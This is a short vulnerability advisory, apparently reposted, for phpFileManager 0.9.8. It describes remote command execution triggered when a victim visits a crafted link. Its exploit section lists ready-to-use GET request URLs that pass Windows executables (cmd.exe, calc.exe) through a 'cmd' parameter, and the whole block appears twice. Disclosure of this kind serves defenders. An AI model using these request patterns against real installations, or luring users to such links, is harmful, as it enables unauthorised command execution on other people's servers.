phpFileManager 0.9.8 Remote Command Execution
Description:
phpFileManager is a complete filesystem management tool on a single file. Features: server info, directory tree, copy/move/delete/create/rename/edit/view/chmod files and folders, tar/zip/bzip/gzip, multiple uploads, shell/exec, works on linux/windows
Features
- server info
- directory tree
- copy/move/delete/create/rename/edit/view/chmod files and folders
- tar/zip/bzip/gzip
- multiple uploads
- shell/exec
- works on linux/windows
Exploits
PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victims browser. By getting the victim to click our malicious link or visit our malicious website.
Exploit code(s):
===============
Remote Command Execution:
-------------------------
1- call Windows cmd.exe
https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
2- Run Windows calc.exe
https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe
===============
Remote Command Execution:
-------------------------
1- call Windows cmd.exe
https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
2- Run Windows calc.exe
https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe
Source from :
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt